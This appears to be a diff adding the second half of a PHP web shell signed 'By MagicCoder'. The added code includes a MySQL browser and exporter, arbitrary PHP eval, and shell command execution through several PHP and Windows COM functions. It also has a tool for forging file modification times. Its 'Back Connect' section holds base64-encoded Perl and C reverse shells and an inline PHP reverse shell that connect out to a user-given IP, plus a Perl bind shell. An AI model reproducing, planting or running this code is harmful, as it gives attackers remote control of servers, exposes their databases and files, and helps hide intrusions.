+						p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
+					} else {
+						p('<tr class="'.bg().'"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
+						makehide('base64', $base64);
+					}
+					p('</table></form>');
+				} else {
+					$querys = @explode(';',$sql_query);
+					foreach($querys as $num=>$query) {
+						if ($query) {
+							p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
+							switch(qy($query))
+							{
+								case 0:
+									p('<h2>Error : '.mysql_error().'</h2>');
+									break;	
+								case 1:
+									if (strtolower(substr($query,0,13)) == 'select * from') {
+										$allowedit = 1;
+									}
+									if ($getnumsql) {
+										$tatol = mysql_num_rows(q($getnumsql));
+										$multipage = multi($tatol, $pagenum, $page, $tablename);
+									}
+									if (!$tablename) {
+									     
+										$sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
+										$sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
+										preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
+										$tablename = $matches[1][0];
+									}
+									$result = q($query);
+									p($multipage);
+									p('<table border="0" cellpadding="3" cellspacing="0">');
+									p('<tr class="head">');
+									if ($allowedit) p('<td>Action</td>');
+									$fieldnum = @mysql_num_fields($result);
+									for($i=0;$i<$fieldnum;$i++){
+										$name = @mysql_field_name($result, $i);
+										$type = @mysql_field_type($result, $i);
+										$len = @mysql_field_len($result, $i);
+										p("<td nowrap>$name<br><span>$type($len)</span></td>");
+									}
+									p('</tr>');
+									while($mn = @mysql_fetch_assoc($result)){
+										$thisbg = bg();
+										p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+										$where = $tmp = $b1 = '';
+										foreach($mn as $key=>$inside){
+											if ($inside) {
+												$where .= $tmp.$key."='".addslashes($inside)."'";
+												$tmp = ' AND ';
+											}
+											$b1 .= '<td nowrap>'.html_clean($inside).'&nbsp;</td>';
+										}
+										$where = base64_encode($where);
+										if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \''.$where.'\', \''.$tablename.'\');">Edit</a> | <a href="javascript:editrecord(\'del\', \''.$where.'\', \''.$tablename.'\');">Del</a></td>');
+										p($b1);
+										p('</tr>');
+										unset($b1);
+									}
+									tbfoot();
+									p($multipage);
+									break;	
+								case 2:
+									$ar = mysql_affected_rows();
+									p('<h2>affected rows : <b>'.$ar.'</b></h2>');
+									break;
+							}
+						}
+					}
+				}
+			} else {
+				$query = q("SHOW TABLE STATUS");
+				$table_num = $table_rows = $data_size = 0;
+				$tabledb = array();
+				while($table = mysql_fetch_array($query)) {
+					$data_size = $data_size + $table['Data_length'];
+					$table_rows = $table_rows + $table['Rows'];
+					$table['Data_length'] = sizecount($table['Data_length']);
+					$table_num++;
+					$tabledb[] = $table;
+				}
+				$data_size = sizecount($data_size);
+				unset($table);
+				p('<table border="0" cellpadding="0" cellspacing="0">');
+				p('<form action="'.$self.'" method="POST">');
+				makehide('action','sqladmin');
+				p($dbform);
+				p('<tr class="head">');
+				p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
+				p('<td>Name</td>');
+				p('<td>Rows</td>');
+				p('<td>Data_length</td>');
+				p('<td>Create_time</td>');
+				p('<td>Update_time</td>');
+				if ($highver) {
+					p('<td>Engine</td>');
+					p('<td>Collation</td>');
+				}
+				p('</tr>');
+				foreach ($tabledb as $key => $table) {
+					$thisbg = bg();
+					p('<tr class="'.$thisbg.'" onmouseover="this.className=\'focus\';" onmouseout="this.className=\''.$thisbg.'\';">');
+					p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="'.$table['Name'].'" /></td>');
+					p('<td><a href="javascript:settable(\''.$table['Name'].'\');">'.$table['Name'].'</a> [ <a href="javascript:settable(\''.$table['Name'].'\', \'insert\');">Insert</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'structure\');">Structure</a> | <a href="javascript:settable(\''.$table['Name'].'\', \'drop\');">Drop</a> ]</td>');
+					p('<td>'.$table['Rows'].'</td>');
+					p('<td>'.$table['Data_length'].'</td>');
+					p('<td>'.$table['Create_time'].'</td>');
+					p('<td>'.$table['Update_time'].'</td>');
+					if ($highver) {
+						p('<td>'.$table['Engine'].'</td>');
+						p('<td>'.$table['Collation'].'</td>');
+					}
+					p('</tr>');
+				}
+				p('<tr class='.bg().'>');
+				p('<td>&nbsp;</td>');
+				p('<td>Total tables: '.$table_num.'</td>');
+				p('<td>'.$table_rows.'</td>');
+				p('<td>'.$data_size.'</td>');
+				p('<td colspan="'.($highver ? 4 : 2).'">&nbsp;</td>');
+				p('</tr>');
+
+				p("<tr class=\"".bg()."\"><td colspan=\"".($highver ? 8 : 6)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$_SERVER['HTTP_HOST']."_MySQL.sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>");
+				makehide('doing','backupmysql');
+				formfoot();
+				p("</table>");
+				fr($query);
+			}
+		}
+	}
+	tbfoot();
+	@mysql_close();
+}//end sql backup
+
+
+elseif ($action == 'net') {
+	!$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
+	!$yourport && $yourport = '1370';
+	$usedb = array('perl'=>'perl','php'=>'php (proc_open)','c'=>'c');
+
+	$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
+		"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
+		"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
+		"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
+		"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
+		"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
+		"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
+	$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
+		"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
+		"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
+		"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
+		"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
+		"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
+		"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
+		"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
+	$bind_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS".
+		"VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs".
+		"JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV".
+		"TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG".
+		"lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK".
+		"Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i".
+		"Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N".
+		"lIENPTk47DQpleGl0IDA7DQp9DQp9";
+
+	if ($start_cb && $yourip && $yourport && $use){
+		if ($use == 'perl') {
+			cf('/tmp/magiccoder_bc',$back_connect);
+			switch ($_POST['execfunction_cb']) {
+				case 'system':
+					$res = @system(which('perl')." /tmp/magiccoder_bc $yourip $yourport &");
+					break;
+				case 'passthru':
+					$res = @passthru(which('perl')." /tmp/magiccoder_bc $yourip $yourport &");
+					break;
+				case 'exec':
+					$res = @exec(which('perl')." /tmp/magiccoder_bc $yourip $yourport &");
+					break;
+				case 'execute':
+					$res = @execute(which('perl')." /tmp/magiccoder_bc $yourip $yourport &");
+					break;
+				case 'shell_exec':
+					$res = @shell_exec(which('perl')." /tmp/magiccoder_bc $yourip $yourport &");
+					break;
+				case 'popen':
+					$res = @fread(popen(which('perl')." /tmp/magiccoder_bc $yourip $yourport &",r), 9999);
+					break;
+				}
+
+		} elseif ($use == 'php') {
+			set_time_limit (0); 
+			$VERSION = "1.0"; 
+			$ip = $yourip; 
+			$port = $yourport; 
+			$chunk_size = 1400; 
+			$write_a = null; 
+			$error_a = null; 
+			$shell = "uname -a; w; id; /bin/sh -i"; 
+			$daemon = 0; 
+			$debug = 0; 
+			chdir("/"); 
+			umask(0); 
+			$sock = @fsockopen($ip, $port, $errno, $errstr, 30); 
+			if (!$sock) { 
+			    echo("$errstr ($errno)"); 
+			    exit(1); 
+			    } 
+			$descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); 
+			    $process = proc_open($shell, $descriptorspec, $pipes); 
+			if (!is_resource($process)) { 
+			    exit(1); 
+			    } 
+			stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); 
+			stream_set_blocking($pipes[2], 0); 
+			stream_set_blocking($sock, 0); 
+			while (1) { 
+			    if (feof($sock)) { 
+			    break; 
+			    } 
+			    if (feof($pipes[1])) { 
+			    break; 
+			    } 
+			    $read_a = array($sock, $pipes[1], $pipes[2]); 
+			    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); 
+			    if (in_array($sock, $read_a)) { 
+				if ($debug) echo("SOCK READ"); 
+				$input = fread($sock, $chunk_size); 
+				if ($debug) echo("SOCK: $input"); 
+				fwrite($pipes[0], $input); 
+			    } 
+			    if (in_array($pipes[1], $read_a)) { 
+				if ($debug) echo("STDOUT READ"); 
+				$input = fread($pipes[1], $chunk_size); 
+				if ($debug) echo("STDOUT: $input"); 
+				fwrite($sock, $input); 
+				} 
+			    if (in_array($pipes[2], $read_a)) { 
+				if ($debug) echo("STDERR READ"); 
+				$input = fread($pipes[2], $chunk_size); 
+				if ($debug) echo("STDERR: $input"); 
+				fwrite($sock, $input); 
+				} 
+			    } 
+			fclose($sock); 
+			fclose($pipes[0]); 
+			fclose($pipes[1]); 
+			fclose($pipes[2]); 
+			proc_close($process); 
+
+		} else {
+			echo '<center>Use from <b>'.$_POST['execfunction_cb'].'</b> function<hr width="222px" noshade /></center>';
+			cf('/tmp/magiccoder_bc.c',$back_connect_c);
+			switch ($_POST['execfunction_cb']) {
+				case 'system':
+					$res = @system('gcc -o /tmp/magiccoder_bc /tmp/magiccoder_bc.c');
+					@unlink('/tmp/magiccoder_bc.c');
+					$res = @system("/tmp/magiccoder_bc $yourip $yourport &");
+					break;
+				case 'passthru':
+					$res = @passthru('gcc -o /tmp/magiccoder_bc /tmp/magiccoder_bc.c');
+					@unlink('/tmp/magiccoder_bc.c');
+					$res = @passthru("/tmp/magiccoder_bc $yourip $yourport &");
+					break;
+				case 'exec':
+					$res = @exec('gcc -o /tmp/magiccoder_bc /tmp/magiccoder_bc.c');
+					@unlink('/tmp/magiccoder_bc.c');
+					$res = @exec("/tmp/magiccoder_bc $yourip $yourport &");
+					break;
+				case 'execute':
+					$res = execute('gcc -o /tmp/magiccoder_bc /tmp/magiccoder_bc.c');
+					@unlink('/tmp/magiccoder_bc.c');
+					$res = execute("/tmp/magiccoder_bc $yourip $yourport &");
+					break;
+				case 'shell_exec':
+					$res = @shell_exec('gcc -o /tmp/magiccoder_bc /tmp/magiccoder_bc.c');
+					@unlink('/tmp/magiccoder_bc.c');
+					$res = @shell_exec("/tmp/magiccoder_bc $yourip $yourport &");
+					break;
+				case 'popen':
+					$res = @fread(popen('gcc -o /tmp/magiccoder_bc /tmp/magiccoder_bc.c',r), 9999);
+					@unlink('/tmp/magiccoder_bc.c');
+					$res = @fread(popen("/tmp/magiccoder_bc $yourip $yourport &",r), 9999);
+					break;
+				}
+		}
+		m("Now script try connect to $yourip port $yourport ...");
+		echo '<br><center>Use from <b>'.$_POST['execfunction_cb'].'</b> function<hr width="222px" noshade /></center>';
+	}
+
+	formhead(array('title'=>'Back Connect'));
+	makehide('action','net');
+	p('<p>');
+	p('Your IP:');
+	makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip));
+	p('Your Port:');
+	makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport));
+	p('Use:');
+	makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
+	echo "Function: <select class=\"input\" name=\"execfunction_cb\" >\n<option value=\"system\">system</option>\n<option value=\"passthru\">passthru</option>\n<option value=\"exec\">exec</option>\n<option value=\"execute\">execute</option>\n<option value=\"shell_exec\">shell_exec</option>\n<option value=\"popen\">popen</option>\n</select>\n";
+
+	makeinput(array('name'=>'start_cb','value'=>'Start','type'=>'submit','class'=>'bt'));
+	p('</p>');
+	formfoot();
+////////////////
+	!$yourport_bind && $yourport_bind = '13700527';
+	$usedb = array('perl'=>'perl');
+	if ($start_bind && $yourport && $use){
+		if ($use == 'perl') {
+			cf('/tmp/magiccoder_bind_pl',$bind_pl);
+			switch ($_POST['execfunction_bind']) {
+				case 'system':
+					$res = @system(which('perl')." /tmp/magiccoder_bind_pl $yourport_bind &");
+					break;
+				case 'passthru':
+					$res = @passthru(which('perl')." /tmp/magiccoder_bind_pl $yourport_bind &");
+					break;
+				case 'exec':
+					$res = @exec(which('perl')." /tmp/magiccoder_bind_pl $yourport_bind &");
+					break;
+				case 'execute':
+					$res = @execute(which('perl')." /tmp/magiccoder_bind_pl $yourport_bind &");
+					break;
+				case 'shell_exec':
+					$res = @shell_exec(which('perl')." /tmp/magiccoder_bind_pl $yourport_bind &");
+					break;
+				case 'popen':
+					$res = @fread(popen(which('perl')." /tmp/magiccoder_bind_pl $yourport_bind &",r), 9999);
+					break;
+				}
+
+		}
+		m("bind on port $yourport_bind Started...");
+		echo '<br><center>Use from <b>'.$_POST['execfunction_bind'].'</b> function<hr width="222px" noshade /></center>';
+
+	}
+
+	formhead(array('title'=>'Bind Port'));
+	makehide('action','net');
+	p('<p>');
+	p('Your Port:');
+	makeinput(array('name'=>'yourport_bind','size'=>15,'value'=>$yourport_bind));
+	p('Use:');
+	makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use));
+	echo "Function: <select class=\"input\" name=\"execfunction_bind\" >\n<option value=\"system\">system</option>\n<option value=\"passthru\">passthru</option>\n<option value=\"exec\">exec</option>\n<option value=\"execute\">execute</option>\n<option value=\"shell_exec\">shell_exec</option>\n<option value=\"popen\">popen</option>\n</select>\n";
+    
+	makeinput(array('name'=>'start_bind','value'=>'Start','type'=>'submit','class'=>'bt'));
+	p('</p>');
+	formfoot();
+
+}//end sql backup
+
+elseif ($action == 'eval') {
+	$phpcode = trim($phpcode);
+	if($phpcode){
+		if (!preg_match('#<\?#si', $phpcode)) {
+			$phpcode = "<?php\n\n{$phpcode}\n\n?>";
+		}
+		eval("?".">$phpcode<?");
+	}
+	formhead(array('title'=>'Eval PHP Code'));
+	makehide('action','eval');
+	maketext(array('title'=>'PHP Code','name'=>'phpcode', 'value'=>$phpcode));
+	formfooter();
+}//end eval
+
+elseif ($action == 'editfile') {
+	if(file_exists($opfile)) {
+		$fp=@fopen($opfile,'r');
+		$contents=@fread($fp, filesize($opfile));
+		@fclose($fp);
+		$contents=htmlspecialchars($contents);
+	}
+	formhead(array('title'=>'Create / Edit File'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Current File (import new file name and new file)','name'=>'editfilename','value'=>$opfile,'newline'=>1));
+	maketext(array('title'=>'File Content','name'=>'filecontent','value'=>$contents));
+	formfooter();
+}//end editfile
+
+elseif ($action == 'newtime') {
+	$opfilemtime = @filemtime($opfile);
+	//$time = strtotime("$year-$month-$day $hour:$minute:$second");
+	$cachemonth = array('January'=>1,'February'=>2,'March'=>3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9,'October'=>10,'November'=>11,'December'=>12);
+	formhead(array('title'=>'Clone file was last modified time'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Alter file','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
+	makeinput(array('title'=>'Reference file (fullpath)','name'=>'tarfile','size'=>120,'newline'=>1));
+	formfooter();
+	formhead(array('title'=>'Set last modified'));
+	makehide('action','file');
+	makehide('dir',$nowpath);
+	makeinput(array('title'=>'Current file (fullpath)','name'=>'curfile','value'=>$opfile,'size'=>120,'newline'=>1));
+	p('<p>Instead &raquo;');
+	p('year:');
+	makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4));
+	p('month:');
+	makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2));
+	p('day:');
+	makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2));
+	p('hour:');
+	makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2));
+	p('minute:');
+	makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2));
+	p('second:');
+	makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2));
+	p('</p>');
+	formfooter();
+}//end newtime
+
+elseif ($action == 'shell') {
+	if (IS_WIN && IS_COM) {
+		if($program && $parameter) {
+			$shell= new COM('Shell.Application');
+			$a = $shell->ShellExecute($program,$parameter);
+			m('Program run has '.(!$a ? 'success' : 'fail'));
+		}
+		!$program && $program = 'c:\windows\system32\cmd.exe';
+		!$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt';
+		formhead(array('title'=>'Execute Program'));
+		makehide('action','shell');
+		makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1));
+		p('<p>');
+		makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter));
+		makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
+		p('</p>');
+		formfoot();
+	}
+	formhead(array('title'=>'Execute Command'));
+	makehide('action','shell');
+	if (IS_WIN && IS_COM) {
+		$execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open');
+		makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1));
+	}
+	p('<p>');
+	makeinput(array('title'=>'Command','name'=>'command','value'=>$command));
+	if (!IS_WIN && !IS_COM){	
+		echo "<select class=\"input\" name=\"execfunction\" >\n<option value=\"system\">system</option>\n<option value=\"passthru\">passthru</option>\n<option value=\"exec\">exec</option>\n<option value=\"execute\">execute</option>\n<option value=\"shell_exec\">shell_exec</option>\n<option value=\"popen\">popen</option>\n</select>\n";
+}
+	makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute'));
+	p('</p>');
+	formfoot();
+
+	if ($command) {
+		p('<hr width="100%" noshade /><pre>');
+		if ($execfunc=='wscript' && IS_WIN && IS_COM) {
+			$wsh = new COM('WScript.shell');
+			$exec = $wsh->exec('cmd.exe /c '.$command);
+			$stdout = $exec->StdOut();
+			$stroutput = $stdout->ReadAll();
+			echo $stroutput;
+		} elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
+			$descriptorspec = array(
+			   0 => array('pipe', 'r'),
+			   1 => array('pipe', 'w'),
+			   2 => array('pipe', 'w')
+			);
+			$process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
+			if (is_resource($process)) {
+				fwrite($pipes[0], $command."\r\n");
+				fwrite($pipes[0], "exit\r\n");
+				fclose($pipes[0]);
+				while (!feof($pipes[1])) {
+					echo fgets($pipes[1], 1024);
+				}
+				fclose($pipes[1]);
+				while (!feof($pipes[2])) {
+					echo fgets($pipes[2], 1024);
+				}
+				fclose($pipes[2]);
+				proc_close($process);
+			}
+		} else {
+			echo '<center>Use from <b>'.$_POST['execfunction'].'</b> function<hr width="222px" noshade /></center>';
+			switch ($_POST['execfunction']) {
+				case 'system':
+					@system($command);
+					break;
+				case 'passthru':
+					@passthru($command);
+					break;
+				case 'exec':
+					echo @exec($command);
+					break;
+				case 'execute':
+					echo @execute($command);
+					break;
+				case 'shell_exec':
+					echo @shell_exec($command);
+					break;
+				case 'popen':
+					echo @fread(popen($command,r), 9999);
+					break;
+				}
+		}
+		p('</pre>');
+	}
+}//end shell
+
+elseif ($action == 'phpenv') {
+	$upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
+	$adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
+	!$dis_func && $dis_func = 'No';	
+	$info = array(
+		1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
+		2 => array('Server Domain',$_SERVER['SERVER_NAME']),
+		3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
+		4 => array('Server OS',PHP_OS),
+		5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
+		6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
+		7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
+		8 => array('PHP run mode',strtoupper(php_sapi_name())),
+		9 => array('The file path',__FILE__),
+
+		10 => array('PHP Version',PHP_VERSION),
+		11 => array('PHPINFO',(IS_PHPINFO ? '<a href="javascript:goaction(\'phpinfo\');">Yes</a>' : 'No')),
+		12 => array('Safe Mode',getcfg('safe_mode')),
+		13 => array('Administrator',$adminmail),
+		14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
+		15 => array('enable_dl',getcfg('enable_dl')),
+		16 => array('display_errors',getcfg('display_errors')),
+		17 => array('register_globals',getcfg('register_globals')),
+		18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
+		19 => array('memory_limit',getcfg('memory_limit')),
+		20 => array('post_max_size',getcfg('post_max_size')),
+		21 => array('upload_max_filesize',$upsize),
+		22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
+		23 => array('disable_functions',$dis_func),
+	);
+
+	if($phpvarname) {
+		m($phpvarname .' : '.getcfg($phpvarname));
+	}
+
+	formhead(array('title'=>'Server environment'));
+	makehide('action','phpenv');
+	makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
+	formfooter();
+
+	$hp = array(0=> 'Server', 1=> 'PHP');
+	for($a=0;$a<2;$a++) {
+		p('<h2>'.$hp[$a].' &raquo;</h2>');
+		p('<ul class="info">');
+		if ($a==0) {
+			for($i=1;$i<=9;$i++) {
+				p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
+			}
+		} elseif ($a == 1) {
+			for($i=10;$i<=23;$i++) {
+				p('<li><u>'.$info[$i][0].':</u>'.$info[$i][1].'</li>');
+			}
+		}
+		p('</ul>');
+	}
+}//end phpenv
+
+else {
+	m('Undefined Action');
+	echo '<br><br>';
+// ²é¿´PHPINFO
+if ($action == 'phpinfo') {
+	if (IS_PHPINFO) {
+		phpinfo();
+	} else {
+		$errmsg = 'phpinfo() function has non-permissible';
+	}
+}
+
+}
+
+?>
+</td></tr></table>
+<div style="padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;">
+	<span style="float:right;"><?php debuginfo();ob_end_flush();?></span>
+	By MagicCoder
+</div>
+</body>
+</html>
+
+<?php
+
+/*======================================================
+º¯Êý¿â
+======================================================*/
+
+function m($msg) {
+	echo '<div style="background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:center;font-weight:bold;">';
+	echo $msg;
+	echo '</div>';
+}
+function scookie($key, $value, $life = 0, $prefix = 1) {
+	global $admin, $timestamp, $_SERVER;
+	$key = ($prefix ? $admin['cookiepre'] : '').$key;
+	$life = $life ? $life : $admin['cookielife'];
+	$useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
+	setcookie($key, $value, $timestamp+$life, $admin['cookiepath'], $admin['cookiedomain'], $useport);
+}	
+function multi($num, $perpage, $curpage, $tablename) {
+	$multipage = '';
+	if($num > $perpage) {
+		$page = 10;
+		$offset = 5;
+		$pages = @ceil($num / $perpage);
+		if($page > $pages) {
+			$from = 1;
+			$to = $pages;
+		} else {
+			$from = $curpage - $offset;
+			$to = $curpage + $page - $offset - 1;
+			if($from < 1) {
+				$to = $curpage + 1 - $from;
+				$from = 1;
+				if(($to - $from) < $page && ($to - $from) < $pages) {
+					$to = $page;
+				}
+			} elseif($to > $pages) {
+				$from = $curpage - $pages + $to;
+				$to = $pages;
+				if(($to - $from) < $page && ($to - $from) < $pages) {
+					$from = $pages - $page + 1;
+				}
+			}
+		}
+		$multipage = ($curpage - $offset > 1 && $pages > $page ? '<a href="javascript:settable(\''.$tablename.'\', \'\', 1);">First</a> ' : '').($curpage > 1 ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage - 1).');">Prev</a> ' : '');
+		for($i = $from; $i <= $to; $i++) {
+			$multipage .= $i == $curpage ? $i.' ' : '<a href="javascript:settable(\''.$tablename.'\', \'\', '.$i.');">['.$i.']</a> ';
+		}
+		$multipage .= ($curpage < $pages ? '<a href="javascript:settable(\''.$tablename.'\', \'\', '.($curpage + 1).');">Next</a>' : '').($to < $pages ? ' <a href="javascript:settable(\''.$tablename.'\', \'\', '.$pages.');">Last</a>' : '');
+		$multipage = $multipage ? '<p>Pages: '.$multipage.'</p>' : '';
+	}
+	return $multipage;
+}
+// µÇ½Èë¿Ú
+function loginpage() {
+?>
+	<style type="text/css">
+	input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}
+	</style>
+	<form method="POST" action="">
+	<span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
+	<input type="hidden" name="doing" value="login">
+	<input type="submit" value="Login">
+	</form>
+<?php
+	exit;
+}//end loginpage()
+
+function execute($cfe) {
+	$res = '';
+	if ($cfe) {
+		if(function_exists('exec')) {
+			@exec($cfe,$res);
+			$res = join("\n",$res);
+		} elseif(function_exists('shell_exec')) {
+			$res = @shell_exec($cfe);
+		} elseif(function_exists('system')) {
+			@ob_start();
+			@system($cfe);
+			$res = @ob_get_contents();
+			@ob_end_clean();
+		} elseif(function_exists('passthru')) {
+			@ob_start();
+			@passthru($cfe);
+			$res = @ob_get_contents();
+			@ob_end_clean();
+		} elseif(@is_resource($f = @popen($cfe,"r"))) {
+			$res = '';
+			while(!@feof($f)) {
+				$res .= @fread($f,1024); 
+			}
+			@pclose($f);
+		}
+	}
+	return $res;
+}
+function which($pr) {
+	$path = execute("which $pr");
+	return ($path ? $path : $pr); 
+}
+
+function cf($fname,$text){
+	if($fp=@fopen($fname,'w')) {
+		@fputs($fp,@base64_decode($text));
+		@fclose($fp);
+	}
+}
+
